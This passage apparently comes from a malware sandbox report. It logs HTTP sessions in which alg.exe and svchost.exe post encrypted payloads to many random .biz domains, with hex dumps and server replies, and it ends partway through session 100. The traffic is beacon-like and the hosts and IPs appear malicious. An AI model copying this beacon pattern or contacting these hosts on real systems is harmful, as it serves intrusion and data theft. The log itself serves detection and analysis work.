                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              91192.168.2.45008913.251.16.150802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.672519922 CEST346OUTPOST /ctr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.672548056 CEST778OUTData Raw: 0e c0 47 0f 0f b7 b5 05 fe 02 00 00 75 fd a6 c2 0a e4 4b 5c 91 18 06 28 6d 34 ed 32 2e 25 58 99 91 7f 83 ad d7 76 ac d5 eb a3 58 b5 f6 fb 54 be 26 ad d8 60 f5 b6 ff d3 7d 90 47 f0 b4 e3 0a 63 44 b7 eb e3 3a bb 65 46 4f ad ed 12 ee 04 a3 d8 a7 0e
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: GuK\(m42.%XvXT&`}GcD:eFOE[SUY0VpoL"uQ/*oW'K+h5 )RHx1/(uvHffab>EEnWzjW1O{RZDmQhh;
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.006650925 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=2208f7eea2544e1859d5c4a602c5dfc2|8.46.123.33|1728394156|1728394156|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              92192.168.2.45009047.129.31.212804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.290257931 CEST353OUTPOST /rjfjacxyvik HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.290714979 CEST786OUTData Raw: 46 cd 68 b5 61 d8 70 5d 06 03 00 00 8b ac f8 a8 ad b5 a7 96 a5 a7 c5 96 a0 ba 85 eb d3 86 3e be 2d 69 4b 96 6e 60 59 ea d4 c0 2d b6 72 44 ab aa 50 2b 4b b1 bf 4d 41 c6 3b a3 dc bf 78 fc 3b 09 92 41 e6 7c fa 57 6d 4b d5 f2 71 38 10 f5 be 8e f9 56
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Fhap]>-iKn`Y-rDP+KMA;x;A|WmKq8V!_B?vS?:@8"`rDq6{H1iuViWyR}z/"pMLk%Hjl);Yq9zB!4R& ?~ m=MgWwY>
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.632180929 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=229c5cc832d6b2ae98aeb33148c2ea7f|8.46.123.33|1728394157|1728394157|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              93192.168.2.45010234.211.97.45802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.397072077 CEST356OUTPOST /snachosinlefnrw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.397072077 CEST778OUTData Raw: f9 a2 9e 74 86 c1 2c 43 fe 02 00 00 b5 fe 98 e9 bf 24 be 87 11 3e 18 05 d0 60 f9 38 69 30 be ce d4 5a db cc 42 39 d7 29 e8 fd e6 9e 68 ec 49 b5 5a 0e ce 71 b5 2f 3c be 72 41 05 8b ba 62 20 ce 88 82 7b 90 85 93 43 93 b8 ad 60 f8 5c 50 38 f2 3b 8a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t,C$>`8i0ZB9)hIZq/<rAb {C`\P8;[`SYn":\:#O-#%H ?n^u*B*6$@K[&MbW&lPAM4HAvbf)"SJ|~=`ca :x543#\vE
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.130628109 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7b363435a0086bb795047a01b4b18bb5|8.46.123.33|1728394158|1728394158|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              94192.168.2.45010318.208.156.248804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.763788939 CEST353OUTPOST /rokvfxqf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.763806105 CEST786OUTData Raw: 5a 91 8b ae 42 fe 14 e1 06 03 00 00 54 1f 31 68 86 06 66 71 01 8e 14 5e e8 d0 e1 a9 7c 84 a1 74 f2 8b b6 f2 7f 79 be ac 05 4f 7b d8 a4 9a a5 f8 75 4e 91 10 b3 b1 fa e2 a4 c4 e5 2d ba d2 8b c3 8e 95 3c 5e a3 76 04 55 15 b5 8c f6 9b 2a 65 be 5d bf
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ZBT1hfq^|tyO{uN-<^vU*e]]KyK]ATK XpB,Toe1u~{Sr|i~)*A|ywr%Q~tyMyW]Zr~OQ0?eOu$&$sTczLWlt
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.227437019 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b6588295e57609693491c7c6151c19af|8.46.123.33|1728394158|1728394158|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              95192.168.2.45010813.251.16.150804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.281915903 CEST345OUTPOST /fkc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.281943083 CEST786OUTData Raw: 4b 02 cc 10 0e a4 60 26 06 03 00 00 3c 2c 07 e8 21 f6 9a b7 ff 30 6b 01 9d 35 9d e0 7d 36 85 5c 0a fa 62 ed 7e 90 4d 13 ed 57 e6 5f af b8 1b 1a 78 00 d0 52 fa ba 7e 12 e9 bc 94 7a d7 72 78 83 41 cb c9 64 55 7e 8d f5 38 25 69 9a 85 4b 21 f5 c6 00
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: K`&<,!0k5}6\b~MW_xR~zrxAdU~8%iK!?ug\?m6PR_vCG-Y2xc="?,a^,Z8["])#N`{N)PsaBXMM:5+Az\99pdq,wYGy>N
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.610471964 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=051f693a0caf73c54d07d2b2a9fd7c25|8.46.123.33|1728394159|1728394159|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              96192.168.2.4501093.94.10.34802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.403551102 CEST361OUTPOST /rkgoodhecptjykcl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.403551102 CEST778OUTData Raw: 1d a1 c1 8e 0b 95 ea 41 fe 02 00 00 fa 4f 36 4d c6 d7 fa b6 c9 b7 1a 72 c9 f6 4d eb 84 2a 25 a0 8e 9a 84 7e 83 13 f1 e9 2e d2 83 92 46 0d 51 1d 8c 58 e4 4e 02 ed ac 93 d3 12 f8 84 46 58 78 ae 4f 36 06 3b 7d 79 8f d2 25 9c 33 88 e8 90 f9 b2 88 98
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: AO6MrM*%~.FQXNFXxO6;}y%3="?KSUBA)I`j}=e^_D>1Yz*[bd.8D,c-GT{Y]Hy5f$*>p|]8$O#u-0w~^ZP0`;935>@CD
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.868707895 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=767237ddb57289a85c40edda7bba0f5c|8.46.123.33|1728394158|1728394158|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              97192.168.2.45011644.213.104.86802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.250225067 CEST351OUTPOST /kitlgdtf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.250256062 CEST778OUTData Raw: 92 bf 4c 15 5f c0 4e 46 fe 02 00 00 d3 95 58 93 09 92 7e c3 f6 e3 f7 52 dc 07 84 c9 ff 8b 9e e4 d4 a0 36 c1 d8 8f 75 05 ab 08 65 19 ae a2 a6 16 f7 9a b0 e8 af 50 48 f2 9a 64 a1 d1 b0 b6 8c 4c 9f 67 f0 f2 36 de e4 93 7a 23 4e 4d f0 db 32 65 d7 2e
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: L_NFX~R6uePHdLg6z#NM2e.1!QCSe*cpR&wztolcB*r|,c%!sa&2Jkq{G9aV}LFEY)Ny&7VkhnTZekF=hf1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.738152981 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1707d83a834d091240ed4d217696b091|8.46.123.33|1728394159|1728394159|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              98192.168.2.45012134.246.200.160804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.725816965 CEST356OUTPOST /gpuqtdsdsmc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.725835085 CEST786OUTData Raw: 32 f1 93 7f f0 ec 3d f0 06 03 00 00 0f ac e8 09 98 29 07 ca 51 ec 59 4e f4 4a af 93 4b ff 58 f0 2b ab 20 cd 1b b5 6b 39 a5 04 57 55 c7 37 5c 72 f4 0e 1a 85 ee fb 32 5a ef 7f c1 a6 6c 04 1f f2 6a 06 17 84 9e d3 bb 6d 98 2b 88 fe 2f 2c a1 8e c0 45
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 2=)QYNJKX+ k9WU7\r2Zljm+/,E7c/\(z_GP`"d|KxVd4PD`F4.HJ{|;b\/|gDfTs="7@rML)v) .3`d8P}#3#f
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.468688011 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=d1bd110ecff911d2a42f1eab0671a014|8.46.123.33|1728394160|1728394160|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              99192.168.2.4501233.254.94.185802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.090920925 CEST350OUTPOST /ieicusmwh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.090920925 CEST778OUTData Raw: 6a 8b 4f bc b8 a8 1c 28 fe 02 00 00 05 45 e9 83 3f 0f d9 ca bd 2a b5 b7 ee e4 a7 03 6e c6 4d 71 01 98 a6 da 3e 35 33 ab c7 6d f9 8e 16 63 b1 1a 27 16 58 0b bd c9 3d 77 d9 93 0a e3 fc 17 01 08 72 48 b8 cf 90 5a aa 27 e7 12 85 7c 95 82 5f df 41 5e
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: jO(E?*nMq>53mc'X=wrHZ'|_A^#lV&~w29PBG9|_8iKM8B;?M|z<+I%Eh&M@_h>I(vFR '\3YYK\j}:sKB
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.907075882 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4260625539565a326d20e772d429f612|8.46.123.33|1728394160|1728394160|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                              100192.168.2.45012818.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.490500927 CEST351OUTPOST /hhgppons HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.490767956 CEST786OUTData Raw: f0 29 90 96 85 a6 a9 db 06 03 00 00 6b 9c f1 ab 61 11 32 4f 1d 85 ba 2b cd 09 a6 3e d4 20 67 06 30 89 5f 55 03 a3 5d e1 28 2b 0b 3f 6d b6 92 dd d3 e3 70 cb 4c 9f 7f ab 5a f1 fb 83 0d f7 94 e7 9f 6c b7 4c 0d 02 96 91 3a b1 8e 6f e6 88 ad 21 42 a1
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: )ka2O+> g0_U](+?mpLZlL:o!Bk#$2XRP%+s7Jx+Zc\n)yJ{7{Ov G-"IuA3TI1#536%UdxM!Zin6.[[:@
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.827528954 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
